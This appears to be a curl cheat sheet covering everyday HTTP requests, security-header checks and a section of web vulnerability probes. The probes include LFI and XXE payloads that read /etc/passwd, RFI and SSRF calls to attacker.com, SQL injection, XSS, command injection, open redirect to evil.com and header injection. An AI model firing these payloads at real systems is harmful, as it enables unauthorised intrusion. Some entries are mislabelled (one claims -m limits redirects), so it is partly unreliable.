Curl is a command-line tool for making HTTP requests. It is widely used for testing APIs, downloading files, and performing various web-related tasks. Below is a cheat sheet to help you use curl effectively:
**Curl Command Cheat Sheet:**
# Simple GET request: curl <URL> # Save output to a file: curl -o <filename> <URL> # Follow redirects: curl -L <URL> # Custom HTTP method: curl -X <METHOD> <URL> # Include headers: curl -H "Header-Name: Header-Value" <URL> # Include multiple headers: curl -H "Header1: Value1" -H "Header2: Value2" <URL> # Set request data with POST method: curl -X POST -d "key1=value1&key2=value2" <URL> # Send JSON data: curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' <URL> # Send data from a file: curl -X POST -d @<filename> <URL> # Basic authentication: curl -u username:password <URL> # Include a user agent: curl -A "User-Agent-String" <URL> # Show request and response headers: curl -v <URL> # Show only response headers: curl -I <URL> # Set request timeout: curl --max-time <seconds> <URL> # Ignore SSL certificate validation: curl -k <URL> # Download multiple files concurrently: curl -O <URL1> -O <URL2> # Display progress during download: curl -# -O <URL> # Download a file with a custom name: curl -o <custom-name> <URL> # Upload a file with PUT method: curl -X PUT -T <file> <URL> # Set custom user agent: curl -H "User-Agent: Custom-UA" <URL>
HTTP methods (GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS)
# GET Request curl -X GET https://api.example.com/data # POST Request curl -X POST -d "param1=value1¶m2=value2" https://api.example.com/data # PUT Request curl -X PUT -d "param1=value1¶m2=value2" https://api.example.com/data # DELETE Request curl -X DELETE https://api.example.com/data # PATCH Request curl -X PATCH -d "param1=new_value1" https://api.example.com/data # HEAD Request curl -X HEAD https://api.example.com/data # OPTIONS Request curl -X OPTIONS https://api.example.com/data
Checking HTTP security Header Security
# Checking HTTP Strict Transport Security (HSTS) header curl -I https://example.com # Checking Content Security Policy (CSP) header curl -I https://example.com # Checking X-Content-Type-Options header curl -I https://example.com # Checking X-Frame-Options header curl -I https://example.com # Checking X-XSS-Protection header curl -I https://example.com # Checking Referrer-Policy header curl -I https://example.com # Checking Feature-Policy header curl -I https://example.com # Checking Cross-Origin-Resource-Policy (CORP) header curl -I https://example.com # Checking Cross-Origin-Embedder-Policy (COEP) header curl -I https://example.com # Checking Cross-Origin-Opener-Policy (COOP) header curl -I https://example.com # Checking Expect-CT header curl -I https://example.com # Checking Public Key Pinning Extension for HTTP (HPKP) header curl -I https://example.com
Curl Command Cheat Sheet for OWASP top 10
# GET Request with Cookies and User-Agent: curl -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" -H "Cookie: name=value; name2=value2" <URL> # POST Request with Custom Headers and Data: curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: Bearer <TOKEN>" -d "username=user&password=pass" <URL> # Sending Data as JSON and Receiving Pretty JSON Output: curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' <URL> | jq . # Follow Redirects and Display Response Headers: curl -iL <URL> # Send Request with Basic Authentication: curl -X GET -u username:password <URL> # Testing for Local File Inclusion (LFI) Vulnerabilities: curl -X GET <URL>/page.php?page=/etc/passwd # Testing for Remote File Inclusion (RFI) Vulnerabilities: curl -X GET <URL>/page.php?url=http://attacker.com/malicious-code.txt # Checking for SSRF (Server-Side Request Forgery): curl -X GET "http://vulnerable.com/api?url=http://internal-server/" # Testing for SQL Injection (GET Request): curl -X GET "<URL>?id=1' OR '1'='1" # Testing for SQL Injection (POST Request): curl -X POST -d "username=admin' OR '1'='1&password=test" <URL> # Testing for Cross-Site Scripting (XSS) Vulnerabilities: curl -X GET -d "input=<script>alert('XSS');</script>" <URL> # Testing for Server-Side Template Injection (SSTI): curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user={{7*7}}" <URL> # Checking for Open Redirect Vulnerabilities: curl -X GET <URL>?redirect=http://evil.com # Testing for Command Injection (Basic Test): curl -X GET "<URL>?input=test; whoami" # Uploading a File with File Upload Functionality: curl -X POST -F "file=@/path/to/local-file" <URL> # Bypassing Web Application Firewalls (WAF): curl -X GET -H "X-Forwarded-For: <malicious-IP>" <URL> # Testing for Cross-Origin Resource Sharing (CORS) Misconfigurations: curl -X GET -H "Origin: evil.com" <URL>
curl commands for text manipulation
# Writing Response to a File with No Progress Output: curl -s -o <output-file> <URL> # Displaying Response Headers Only: curl -I <URL> # Displaying Only HTTP Response Code: curl -o /dev/null -w "%{http_code}" <URL> # Follow Redirects, but Limit Redirects to a Specified Number: curl -L -s -m <max-redirects> <URL> # Using a Specific Network Interface for the Request: curl --interface <interface-name> <URL> # Using a Specific DNS Server for Resolution: curl --dns-servers <dns-server-ip> <URL> # Making a Request with a Specific HTTP Version: curl --http1.0 <URL> curl --http2 <URL> # Sending Data from a File with Raw Format: curl -X POST --data-binary "@<file-path>" <URL> # Using Custom HTTP Headers from a File: curl -X GET -H "@<header-file>" <URL> # Testing for XML External Entity (XXE) Vulnerabilities: curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' <URL> # Testing for Server-Side Request Forgery (SSRF) with Time Delay: curl -X GET "http://vulnerable.com/api?url=http://attacker.com/malicious-code.txt" -m 10 # Testing for HTTP Methods Misconfiguration (PUT, DELETE, etc.): curl -X PUT -d "data=secret" <URL> # Using a Specific User-Agent for the Request: curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" <URL> # Adding a Custom Host Header: curl -H "Host: example.com" <URL> # Using a Specific Proxy for the Request: curl -x <proxy-url>:<port> <URL> # Sending a Form with Multiple Fields: curl -X POST -d "username=user&password=pass&other_field=value" <URL> # Testing for HTTP Header Injection: curl -X GET -H "Header: Malicious-Header%0d%0aInjection: value" <URL>"